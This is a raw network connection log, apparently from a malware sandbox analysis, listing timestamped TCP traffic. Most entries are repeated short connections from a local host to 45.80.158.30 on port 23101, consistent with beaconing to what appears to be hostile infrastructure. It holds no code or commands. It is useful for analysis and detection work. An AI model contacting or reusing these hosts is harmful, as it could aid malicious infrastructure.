                                                                                              Dec 19, 2024 13:20:08.376446009 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.376471043 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.376482010 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.382765055 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.382819891 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.382848024 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.382854939 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.382879972 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.382893085 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.388097048 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.388149977 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.388175964 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.388181925 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.388205051 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.388217926 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.394175053 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.394234896 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.394257069 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.394263983 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.394285917 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.394294024 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.546894073 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.546955109 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.546994925 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.547008991 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.547049046 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.547049046 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.551435947 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.551500082 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.551515102 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.551522017 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.551553965 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.551570892 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.557434082 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.557480097 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.557658911 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.557667017 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.557707071 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.563453913 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.563497066 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.563529968 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.563535929 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.563574076 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.563592911 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.568752050 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.568795919 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.568825960 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.568831921 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.568865061 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.568885088 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.575110912 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.575153112 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.575187922 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.575193882 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.575234890 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.575254917 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.576050043 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.576107979 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.576114893 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.576193094 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.576309919 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.576327085 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.576334953 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.576349974 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.576383114 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:08.670099974 CET4976123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:08.789768934 CET231014976145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:08.789835930 CET4976123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:08.795223951 CET4976123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:08.914711952 CET231014976145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:09.875629902 CET231014976145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:09.876441956 CET4976123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:09.876523018 CET4976123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:09.996711016 CET231014976145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:10.419980049 CET4976723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:10.539612055 CET231014976745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:10.539685011 CET4976723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:10.542628050 CET4976723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:10.662312984 CET231014976745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:11.512027025 CET4972480192.168.2.423.32.238.18
                                                                                              Dec 19, 2024 13:20:11.629331112 CET231014976745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:11.629416943 CET4976723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:11.629462004 CET4976723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:11.632076025 CET804972423.32.238.18192.168.2.4
                                                                                              Dec 19, 2024 13:20:11.632134914 CET4972480192.168.2.423.32.238.18
                                                                                              Dec 19, 2024 13:20:11.749527931 CET231014976745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:12.056603909 CET4977323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:12.176292896 CET231014977345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:12.176928043 CET4977323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:12.180403948 CET4977323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:12.299976110 CET231014977345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:13.270055056 CET231014977345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:13.270133972 CET4977323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:13.270220995 CET4977323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:13.390419960 CET231014977345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:13.801028967 CET4977923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:13.921014071 CET231014977945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:13.922305107 CET4977923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:13.925951958 CET4977923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:14.045818090 CET231014977945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:15.010552883 CET231014977945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:15.010624886 CET4977923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:15.010705948 CET4977923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:15.130347967 CET231014977945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:16.012793064 CET4978523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:16.132834911 CET231014978545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:16.134263039 CET4978523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:16.137229919 CET4978523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:16.256834984 CET231014978545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:17.228946924 CET231014978545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:17.229063034 CET4978523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:17.229183912 CET4978523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:17.230577946 CET4978623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:17.348922014 CET231014978545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:17.350215912 CET231014978645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:17.350316048 CET4978623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:17.354535103 CET4978623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:17.474123001 CET231014978645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:18.439682961 CET231014978645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:18.440638065 CET4978623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:18.440722942 CET4978623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:18.441524982 CET4979223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:18.560442924 CET231014978645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:18.563052893 CET231014979245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:18.563138008 CET4979223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:18.566884995 CET4979223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:18.687150955 CET231014979245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:19.651885986 CET231014979245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:19.651997089 CET4979223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:19.652107954 CET4979223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:19.653273106 CET4979623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:19.771819115 CET231014979245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:19.772855997 CET231014979645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:19.776446104 CET4979623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:19.779603004 CET4979623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:19.899482965 CET231014979645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:20.865890026 CET231014979645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:20.865957022 CET4979623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:20.866050005 CET4979623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:20.985776901 CET231014979645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:21.872121096 CET4980323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:21.991720915 CET231014980345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:21.991791010 CET4980323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:21.994760036 CET4980323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:22.115063906 CET231014980345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:23.082387924 CET231014980345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:23.082459927 CET4980323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:23.082550049 CET4980323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:23.083463907 CET4980523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:23.202009916 CET231014980345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:23.202977896 CET231014980545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:23.203063965 CET4980523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:23.206546068 CET4980523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:23.326527119 CET231014980545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:24.290781975 CET231014980545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:24.290956974 CET4980523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:24.291019917 CET4980523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:24.292020082 CET4981123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:24.411122084 CET231014980545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:24.412143946 CET231014981145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:24.412384033 CET4981123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:24.415710926 CET4981123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:24.535753012 CET231014981145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:25.501399040 CET231014981145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:25.501522064 CET4981123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:25.501629114 CET4981123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:25.505625010 CET4981223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:25.621450901 CET231014981145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:25.625587940 CET231014981245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:25.625672102 CET4981223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:25.629498005 CET4981223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:25.749306917 CET231014981245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:26.711175919 CET231014981245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:26.711258888 CET4981223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:26.711318016 CET4981223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:26.831196070 CET231014981245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:27.716109991 CET4981823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:27.836055040 CET231014981845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:27.836142063 CET4981823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:27.839589119 CET4981823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:27.959393978 CET231014981845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:28.928097963 CET231014981845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:28.928160906 CET4981823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:28.928210020 CET4981823101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:28.929119110 CET4982423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:29.047962904 CET231014981845.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:29.048873901 CET231014982445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:29.048948050 CET4982423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:29.052408934 CET4982423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:29.172290087 CET231014982445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:30.200983047 CET231014982445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:30.201122046 CET4982423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:30.201199055 CET4982423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:30.202471018 CET4982523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:30.321595907 CET231014982445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:30.322206020 CET231014982545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:30.322295904 CET4982523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:30.327328920 CET4982523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:30.446880102 CET231014982545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.415039062 CET231014982545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.415147066 CET4982523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.415241003 CET4982523101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.416317940 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.535092115 CET231014982545.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.536437988 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:31.536523104 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.540019035 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:31.659816980 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:32.625196934 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:32.625272036 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:32.625335932 CET4983123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:32.744879961 CET231014983145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:33.637839079 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:33.757716894 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:33.757828951 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:33.761737108 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:33.881308079 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.844635010 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.844715118 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.844805956 CET4983723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.845815897 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.964631081 CET231014983745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.965445995 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:34.965548038 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:34.969077110 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:35.088603020 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.119858027 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.120280981 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.120659113 CET4984123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.121285915 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.240351915 CET231014984145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.240849018 CET231014984445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:36.240989923 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.244674921 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:36.364490032 CET231014984445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:37.330634117 CET231014984445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:37.330701113 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.330774069 CET4984423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.331587076 CET4984923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.450432062 CET231014984445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:37.451179981 CET231014984945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:37.451257944 CET4984923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.454780102 CET4984923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:37.575047016 CET231014984945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:38.538470984 CET231014984945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:38.542268991 CET4984923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:38.542435884 CET4984923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:38.662221909 CET231014984945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:39.544099092 CET4985623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:39.663794994 CET231014985645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:39.663908005 CET4985623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:39.667442083 CET4985623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:39.787158012 CET231014985645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:40.762387037 CET231014985645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:40.762615919 CET4985623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:40.762702942 CET4985623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:40.763571978 CET4985723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:40.882306099 CET231014985645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:40.883121014 CET231014985745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:40.883209944 CET4985723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:40.886912107 CET4985723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:41.006442070 CET231014985745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:41.971415043 CET231014985745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:41.971518040 CET4985723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:41.971595049 CET4985723101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:41.972476959 CET4986323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:42.091412067 CET231014985745.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:42.092295885 CET231014986345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:42.092499971 CET4986323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:42.096509933 CET4986323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:42.216406107 CET231014986345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:43.186789989 CET231014986345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:43.190407991 CET4986323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:43.190407991 CET4986323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:43.191190004 CET4986423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:43.310087919 CET231014986345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:43.310868979 CET231014986445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:43.314431906 CET4986423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:43.317807913 CET4986423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:43.437382936 CET231014986445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:44.404067039 CET231014986445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:44.404155970 CET4986423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:44.404263020 CET4986423101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:44.524102926 CET231014986445.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:45.435597897 CET4987123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:45.555465937 CET231014987145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:45.556466103 CET4987123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:45.560147047 CET4987123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:45.680480003 CET231014987145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:46.646964073 CET231014987145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:46.647066116 CET4987123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:46.647205114 CET4987123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:46.648417950 CET4987623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:46.766963959 CET231014987145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:46.768201113 CET231014987645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:46.768294096 CET4987623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:46.771770954 CET4987623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:46.891426086 CET231014987645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:47.858196020 CET231014987645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:47.858375072 CET4987623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:47.862386942 CET4987623101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:47.886197090 CET4988023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:47.982021093 CET231014987645.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:48.005968094 CET231014988045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:48.006088018 CET4988023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:48.023914099 CET4988023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:48.143536091 CET231014988045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:49.094444990 CET231014988045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:49.096040964 CET4988023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:49.096281052 CET4988023101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:49.097170115 CET4988323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:49.216157913 CET231014988045.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:49.217017889 CET231014988345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:49.220910072 CET4988323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:49.224575996 CET4988323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:49.345933914 CET231014988345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:50.315038919 CET231014988345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:50.315428019 CET4988323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:50.315510035 CET4988323101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:50.435357094 CET231014988345.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:51.326143026 CET4988923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:51.447664976 CET231014988945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:51.447776079 CET4988923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:51.459647894 CET4988923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:51.579391956 CET231014988945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:52.537528038 CET231014988945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:20:52.537714958 CET4988923101192.168.2.445.80.158.30
